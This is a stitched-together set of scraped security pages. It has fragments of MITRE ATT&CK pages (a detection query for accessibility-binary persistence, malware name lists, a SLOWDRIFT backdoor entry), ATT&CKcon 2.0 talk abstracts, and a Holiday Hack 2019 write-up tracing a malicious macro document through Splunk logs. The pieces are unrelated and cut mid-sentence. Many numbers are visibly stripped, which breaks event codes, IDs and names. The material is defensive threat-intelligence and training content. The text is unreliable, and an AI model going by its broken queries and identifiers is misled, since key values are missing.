EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") | where CommandLine match "$. .(sethcutilmanosknarratormagnify).exe" DS Windows Registry Windows Registry Key Modification Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options. References - Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. - Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017. - Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014. - Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020. - Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016. - Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017. - valsmith. (2012, September 21). More on APTSim. Retrieved
versions_v15_techniques_T1546_008.txt
Currently viewing ATT&CK v7.2 which was live between July 8, 2020 and October 26, 2020. Learn more about the versioning system or see the live site. Register to stream the next session of ATT&CKcon Power Hour November SOFTWARE Overview 3PARA RAT 4H RAT ABK adbupd Adups ADVSTORESHELL Agent Smith Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Anubis Aria-body Arp ASPXSpy Astaroth at Attor AuditCred AutoIt backdoor Avenger Azorult BabyShark BackConfig Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBK BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Bread Briba BS BUBBLEWRAP build_downer Bundlore Cachedump Cadelspy CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT CARROTBALL CARROTBAT Catchamas CCBkdr Cerberus certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT Concipit CORALDECK CORESHELL Corona Updates CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice DEFENSOR ID Dendroid Denis Derusbi Dipsind DOGCALL Dok down_new Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EventBot EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis Gazer GeminiDuke Get gh0st RAT Ginp GLOOXMAIL Gold Dragon GolfSpy Gooligan Goopy GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HotCroissant HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro ifconfig iKitten Imminent Monitor Impacket InnaputRAT INSOMNIA InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Kivars Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax Lokibot LoudMiner LOWBALL Lslsass Lurid Machete MacSpy MailSniper Marcher Matroyshka MazarBOT MAZE MechaFlounder meek MESSAGETAP Metamorfo Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler Netwalker NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya OBAD OceanSalt Octopus Okrum OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PLEAD PlugX pngdowner PoetRAT PoisonIvy Pony POORAIM PoshC POSHSPY Power Loader PowerDuke PowerShower POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump QUADAGENT QuasarRAT Ragnar Locker Ramsay RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Rifdoor Riltok RIPTIDE Rising Sun RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT Ryuk S-Type Sakula SamSam schtasks SDBot SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon SHARPSTATS ShiftyBug ShimRat ShimRatReporter SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skidmap Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys SYSCON Systeminfo T Taidoor TajMahal Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor Triada TrickBot TrickMo Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TSCookie TURNEDUP Twitoor TYPEFRAME UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBferry USBStealer Valak Vasport VBShower VERMIN ViceLeaker Volgmer WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WindTail WINERACK Winexe Wingbird WinMM Winnti for Linux Winnti for Windows Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel YAHOYAH YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell SOFTWARE Overview 1- 3PARA RAT 4H RAT A-B ABK adbupd Adups ADVSTORESHELL Agent Smith Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Anubis Aria-body Arp ASPXSpy Astaroth at Attor AuditCred AutoIt backdoor Avenger Azorult BabyShark BackConfig Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBK BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Bread Briba BS BUBBLEWRAP build_downer Bundlore C-D Cachedump Cadelspy CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT CARROTBALL CARROTBAT Catchamas CCBkdr Cerberus certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT Concipit CORALDECK CORESHELL Corona Updates CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice DEFENSOR ID Dendroid Denis Derusbi Dipsind DOGCALL Dok down_new Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre E-F Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EventBot EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis G-H Gazer GeminiDuke Get gh0st RAT Ginp GLOOXMAIL Gold Dragon GolfSpy Gooligan Goopy GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HotCroissant HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro I-J ifconfig iKitten Imminent Monitor Impacket InnaputRAT INSOMNIA InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy K-L KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Kivars Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax Lokibot LoudMiner LOWBALL Lslsass Lurid M-N Machete MacSpy MailSniper Marcher Matroyshka MazarBOT MAZE MechaFlounder meek MESSAGETAP Metamorfo Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler Netwalker NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya O-P OBAD OceanSalt Octopus Okrum OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PLEAD PlugX pngdowner PoetRAT PoisonIvy Pony POORAIM PoshC POSHSPY Power Loader PowerDuke PowerShower POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump Q-R QUADAGENT QuasarRAT Ragnar Locker Ramsay RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Rifdoor Riltok RIPTIDE Rising Sun RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT Ryuk S-T S-Type Sakula SamSam schtasks SDBot SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon SHARPSTATS ShiftyBug ShimRat ShimRatReporter SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skidmap Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys SYSCON Systeminfo T Taidoor TajMahal Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor Triada TrickBot TrickMo Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TSCookie TURNEDUP Twitoor TYPEFRAME U-V UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBferry USBStealer Valak Vasport VBShower VERMIN ViceLeaker Volgmer W-X WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WindTail WINERACK Winexe Wingbird WinMM Winnti for Linux Winnti for Windows Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel Y-Z YAHOYAH YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell - Home - Software - SLOWDRIFT SLOWDRIFT SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea. [1] ID: S Type: MALWARE Platforms: Windows Version: 1. Created: 18 April Last Modified: 30 March Version Permalink Live Version ATT&CK® Navigator Layers Enterprise Layer download view Techniques Used Domain ID Name Use Enterprise T Ingress Tool Transfer SLOWDRIFT downloads additional payloads.[1] Enterprise T System Information Discovery SLOWDRIFT collects and sends system information to its C2.[1] Enterprise T . Web Service: Bidirectional Communication SLOWDRIFT uses cloud based services for C2.[1] Groups That Use This Software ID Name References G APT [1] References - FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. × load more results
versions_v7_software_S0218.txt
Currently viewing ATT&CK v17.1 which is the current version of ATT&CK. Learn more about the versioning system or see the live site. ATT&CKcon 6.0 is coming October 14-15 in McLean, VA and live online. To potentially join us on stage, submit to our CFP by July 9th - Home - Resources - ATT&CKcon - ATT&CKcon 2. ATT&CKcon 2. Presentations Welcome Katie Nickels, MITRE ATT&CK Threat Intelligence Lead Katie Nickels welcomes attendees and introduces the members of the ATT&CK team. Recording The Friends We Made Along the Way, Keynote Address Toni Gidwani, Google In the keynote from ATT&CKcon 2.0, Toni Gidwani from Google’s Threat Analysis Group presents "The Friends We Made Along the Way." The talk focuses on the purpose of intelligence, to create a decision advantage, and the partnerships that are necessary to achieve that purpose. Recording Slide Deck State of the ATT&CK Blake Strom, MITRE MITRE ATT&CK Lead Blake Strom updates the community on what’s new in ATT&CK since ATT&CKcon 2018 and some of what to expect in the coming year. This talk includes details on ATT&CK for Cloud, the new Impact Tactic, structured mitigations, and the upcoming shift to sub-techniques. Recording Slide Deck Using Threat Intelligence to Focus ATT&CK Activities David Westin and Andy Kettell, Nationwide In October 2018, Nationwide began its MITRE ATT&CK journey. Nationwide looked at a number of different approaches to getting started, but it wasn’t until they prioritized efforts based on threat actors likely to target the finance/insurance industry that things started to click. Ultimately, Nationwide focused on 27 high concern threat actors targeting their industry, reducing the overall number of techniques from 240+ to 91. With this manageable chunk of techniques, Nationwide was able to test, analyze, and provide recommendations for improving its detection and mitigation capabilities. Nationwide is continuing to keep threat actor focus at the heart of its ATT&CK efforts, leading to prioritization of remediation actions, integration into penetration testing, and selection of security tools. Recording Slide Deck Prioritizing ATT&CK Informed Defenses the CIS Way Philippe Langlois, Verizon DBIR; Joshua Franklin, Center for Internet Security In a world of limited resources, organizations have to be strategic and meticulous in their planning and selection of security controls and the MITRE ATT&CK model has become an important piece for categorizing and understanding adversary techniques and contextualizing our own defenses. However, there still underlies a difficult question, where should organizations start and how should they prioritize their cybersecurity efforts? Join CIS as we explore our attempt to tackle this problem through the use of our community, content and real-world threat data collected as part of the Multi-State Information Sharing and Analysis Center (MS-ISAC). Participants should look forward to learning how to prioritize their security efforts and leverage the process for their own data and threats. Recording Slide Deck Alertable Techniques for Linux using ATT&CK Tony Lambert, Red Canary Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow. Recording Slide Deck ATT&CK Updates – TRAM Jackie Lasky and Sarah Yoder, MITRE Updates from the ATT&CK Team's very own Jackie Lasky and Sarah Yoder covering Threat Report ATT&CK Mapping (TRAM). Recording Slide Deck Raiders of the MITRE Framework: How to Build Your Own Threat Library Valentina Palacin and Ruth Esmeralda Barbacil, Deloitte It's the year 2019 and the internet has been around long enough to be filled with what seems to be "ancient" data. Digging through, classifying and analyzing everything sometimes makes you feel a lot like Indiana Jones searching for the right clues in a moving puzzle. But how could you move through the caves without getting buried under piles of data rubble? How might anyone revisit and study the data from the past to transform it into actionable information for the present? In this talk we are going to show you how a threat intel Indiana Jones analyst should tackle these issues in order to find the treasure of the Threat Library. We will show you how we used the MITRE ATT&CK Framework as our book of secrets for turning dusty old Internet artifacts into a library of actionable Threat Intelligence. Recording Slide Deck Climbing the ATT&CK Ladder: How a Threat Hunting Team Has Upgraded Its Use of ATT&CK Karl Scheuerman and Piotr Wojtyla, CrowdStrike CrowdStrike’s OverWatch threat hunting team has continued to mature in its use of the ATT&CK framework to categorize and track targeted adversary behavior. This presentation will build on our talk from last year’s ATT&CKcon, where we shared tactic/technique trends and unique examples observed in the wild. Since that time, we have taken a number of steps to enhance our usage of ATT&CK, including: - Mapping of hunting leads to ATT&CK techniques - Based on that mapping, auto-tagging techniques used in any given intrusion observed in our data set - For that intrusion, automatically extracting process data to easily create tables of TTP details (“ATT&CK Sightings”) - Supplementing automated ATT&CK technique tagging by human analyst reviews - Leveraging MISP’s API to build ATT&CK heat maps with an array of filters on demand By using practices like those outlined above, we have been able to continue building what is likely the most comprehensive and detailed library of targeted intrusion data from the wild that is mapped to ATT&CK. As such, the presentation will also share significant trends and techniques from the intrusions we’ve analyzed over the past year. Recording From Susceptible to ATT&CK: A Threat Hunting Story Chris Thayer, Mastercard The story of one man's crusade to convince the Senior Management of a fortune 500 company that security resources were needed beyond the perimeter, and the role ATT&CK played in those decisions. This talk documents the creation and persuasion required to create a successful threat hunting program at an enterprise level, and how the Mitre ATT&CK framework made this possible for one investigator, in his spare time, to prove the program's worth to senior management within 1 year of creation. Recording Slide Deck ATT&CK Updates – Sightings John Wunder, MITRE Updates from the ATT&CK Team's very own John Wunder covering ATT&CK Sightings. Recording Slide Deck Zeek-based ATT&CK Metrics & Gap Analysis Allan Thomson, LookingGlass Cyber Solutions Today many organizations are using Bro (newly named Zeek) for network security monitor as it provides a powerful network analysis framework. This presentation will describe how to leverage Zeek to report on ATT&CK TTPs, raw events and other detectable activities. Key take-aways include how to report on sightings and occurrences of ATT&CK TTPs and events providing both metrics and gap analysis to inform security operations teams on where their defense may require improvement. Recording Slide Deck attckr: A Toolkit for Analysis & Visualization of ATT&CK Incident Data for Service Providers & Organizations Bob Rudis, Rapid The ATT&CK framework provides a standardized way for organizations to record and share attacker techniques used at each stage in attacker campaigns. Having and sharing this discrete, normalized attacker behavior is great, but these normalized bundles of incident events can also be used to identify areas of improvement in both incident response teams as well as by vendors who provide tools/solutions to triage and manage incidents.This talk will introduce {attckr}: an R package and application that provides programmatic, command-line, and interactive tools to analyze and visualize incident ATT&CK metrics. Attendees will see real-life (i.e. using real, anonymized incident data) examples of how to look across an ATT&CK incident corpus to identify trends (or outliers), support the development of ATT&CK incident baseline metrics, and develop reports and visualizations to assist in communicating operational performance, threat event frequency & type distributions for risk analysis, and identification of strengths and weaknesses in detection capability. Recording Slide Deck MITRE ATT&CK Assessment from a Data Perspective Olaf Hartong, Deloitte MITRE ATT&CK has quickly become the industry standard for referencing techniques. All though the framework is a great and valuable asset it is still lacking actionable detail on may levels to most people. I've bridged that gap by building a relatively simple assessment toolkit to visualize your potential coverage from the data already present in your environment, your mitigative measures and your detection content. The toolkit will help you focus your efforts based on your data and your goal. Recording Slide Deck Threat-Informed Defense: Where do we go from here? Richard Struse, MITRE Richard Struse explores the concept of a threat-informed defense and talks about ways of moving the cyber security community forward. Recording Slide Deck AMITT: ATT&CK-based Standards for Misinformation Threat Sharing Sara-Jayne Terp and John Gray, Credibility Coalition MisinfoSec Working Group State actors, private influence operators and grassroots groups are exploiting the openness and reach of the Internet to manipulate populations at a distance. They are extending a decades-long struggle for “hearts and minds” via propaganda, influence operations and information warfare, often in the form of coordinated incidents that are part of longer-timescale narrative-based campaigns.The Credibility Coalition
versions_v17_resources_attackcon_october-2019.txt
parent id, parent name, and command line. It finds the malicious PowerShell, and gives a parent of WmiPrvSE.exe: Click for full size image It doesn’t give me much information about the parent though. I decided to look at the event logs. I opened the time window to one minute leading up to the PowerShell running. I then issued the following query: * sourcetype="WinEventLog" EventCode= | eval pid=tonumber(New_Process_ID,16) | eval ppid=tonumber(Creator_Process_ID,16) | table _time, pid, New_Process_Name, ppid, Creator_Process_Name, Process_Command_Line | sort _time It starts with event logs for process creation, and then adds two fields, pid and ppid, which are the int versions of the process id and parent process id. Then I’ll create a table of output with the timestamp, pid, process name, parent pid, parent process name, and command line, and make sure it’s sorted by time: Click for full size image At the very end, I see PowerShell start (7) and then it starts a conhost instance (6). Lines 1, 3, and 4 seem to have to do with the opening of a document in Word. Looking at the command line from the first line, I see the filename: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\Temp\Temp1_Buttercups_HOL404_assignment (002).zip\19th Century Holiday Cheer Assignment.docm" /o " It’s a .docm file, which is a Word doc with macros enabled. That’s very suspicious. I’ll submit the filename 19th Century Holiday Cheer Assignment.docm and it’s correct. Question How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? Please provide the numeric value. (Example: 1) Alice talks about stoQ, and gives an example query for how to use it: index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from results{}.workers.smtp.subject results{}.workers.smtp.body | sort - _time This query shows how to walk the nested json: Click for full size image I’ll modify it to get what I need (the query didn’t need to be this complex, but I took capitalization into account): index=main sourcetype=stoq results{}.workers.smtp.subject="Holiday Cheer Assignment Submission" | spath output=from_address path=results{}.workers.smtp.from | eval from_address_lower=lower(from_address) | stats count by from_address_lower | stats count This query takes the data and searches for emails with the subject line required for the submission. Then it creates a field, from_address which is the list of from addresses, and then creates from_address_lower to ensure there are no duplicates. Finally, I’ll use the Splunk stats count to get the count for each sending address, and then the stats count again to get the number of lines returned. It returns 21: I can submit that and it’s correct. If I remove the last stats count, I can see the list of email addresses, each submitting once: Question What was the password for the zip archive that contained the suspicious file? Since I know I’m looking for a .docm file, I’ll start with that. Searching for index=main sourcetype=stoq docm returns only one result. I’ll add a table to get the interesting information: index=main sourcetype=stoq docm | table results{}.workers.smtp.from results{}.workers.smtp.to results{}.workers.smtp.body Click for full size image In the body text, I see the password 123456789, which is the correct answer. Question What email address did the suspicious file come from? I’ve already got the answer to this from the query above, bradly.buttercups@eifu.org. On submitting, I’ve got the training questions complete: Splunk Challenge Question Challenge What was the message for Kent that the adversary embedded in this attack? Alice gives me some more hints: - Work with this archive of files. - Start with the stoQ even from the last challenge question, the email from Bradly Buttercups. - Use the results->payload_meta->extra_data->filename field to find the document I’m looking for, and then use results->archivers->filedir->path to find the path of that file in the archive. - She provides a Splunk command to generate a table of filenames and filepaths from a stoQ log. - Modern word docs are just a bunch of xml files. She doesn’t say this, but in fact, a modern Word doc is just a zip file containing a bunch of mostly xml files. Solution I can paste in the given Splunk query and get the list of files pulled out of this email: Click for full size image That may look like a lot of files, but really, it’s mostly the files from within the Word document. The first line is the email itself. The next is the attached password-protected zip. Then the .docm file from inside the zip. The rest of the files are what make up the document. Despite the fact that Alice warned against downloading malware, I’m comfortable playing with the document in my sandboxed Linux VM. Given the table above, I’ll download it. But the Holiday Hack team didn’t want to actually distribute malware: $ file 19th\ Century\ Holiday\ Cheer\ Assignment.docm 19th Century Holiday Cheer Assignment.docm: ASCII text, with very long lines $ cat 19th\ Century\ Holiday\ Cheer\ Assignment.docm Cleaned for your safety. Happy Holidays! In the real world, This would have been a wonderful artifact for you to investigate, but it had malware in it of course so it's not posted here. Fear not! The core.xml file that was a component of this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-) Given the hint, I’ll pull core.xml and check it out: $ cat core.xml | xmllint --format - <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <dc:title>Holiday Cheer Assignment</dc:title> <dc:subject>19th Century Cheer</dc:subject> <dc:creator>Bradly Buttercups</dc:creator> <cp:keywords/> <dc:description>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</dc:description> <cp:lastModifiedBy>Tim Edwards</cp:lastModifiedBy> <cp:revision>4</cp:revision> <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-19T14:54:00Z</dcterms:created> <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-19T17:50:00Z</dcterms:modified> <cp:category/> </cp:coreProperties> The description field has the message: Kent you are so unfair. And we were going to make you the king of the Winter Carnival. Entering that into the Splunk console solves the challenge, and into my badge solves the objective. Extra - Splunk Table Breakdown The command given by Alice to generate the file table is as follows: index=main sourcetype=stoq "results{}.workers.smtp.from"="bradly buttercups <bradly.buttercups@eifu.org>" | eval results = spath(_raw, "results{}") | mvexpand results | eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), fullpath=path."/".filename | search fullpath!="" | table filename,fullpath Looking at that line by line: - Gets the stoQ log for the malicious email. - Create a value results which is all the results from the passed in log. This will be one single row with all the results. - mvexpand will expand that single row into a row for each result. - Use eval to create path, filename, and fullpath with spath. - Remove any rows where fullpath is empty. - Show filename and fullpath. I don’t really understand why they create fullpath. The archive is set up such that the actual downloadable file is at path. Narrative Alice says she’ll put in a good word for me with the Boss of the SOC. And Professor Banas is grateful: Oh, thanks so much for your help! Sorry I was freaking out. I’ve got to talk to Kent about using my email again… …and picking up my dry cleaning. « 5) Determine Compromised System7) Get Access To The Steam Tunnels »
holidayhack2019_6.txt
Currently viewing ATT&CK v7.0-beta which was live between March 31, 2020 and July 7, 2020. Learn more about the versioning system or see the live site. You are currently viewing the sub-techniques beta. Take a tour, read the blog post or release notes, or see the non-beta version of the site. SOFTWARE Overview 3PARA RAT 4H RAT adbupd Adups ADVSTORESHELL Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Arp ASPXSpy Astaroth at AuditCred AutoIt backdoor Azorult BabyShark Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Briba BS BUBBLEWRAP Cachedump CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT Catchamas CCBkdr certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT CORALDECK CORESHELL CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice Dendroid Denis Derusbi Dipsind DOGCALL Dok Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis Gazer GeminiDuke gh0st RAT GLOOXMAIL Gold Dragon GolfSpy Gooligan GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro ifconfig iKitten Impacket InnaputRAT InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax LOWBALL Lslsass Lurid Machete MacSpy MailSniper Marcher Matroyshka MazarBOT meek Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya OBAD OceanSalt Octopus OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PlugX pngdowner PoisonIvy POORAIM PoshC POSHSPY Power Loader PowerDuke POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump QUADAGENT QuasarRAT RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Riltok RIPTIDE RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT S-Type Sakula SamSam schtasks SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon ShiftyBug SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys Systeminfo T Taidoor Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor TrickBot Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a 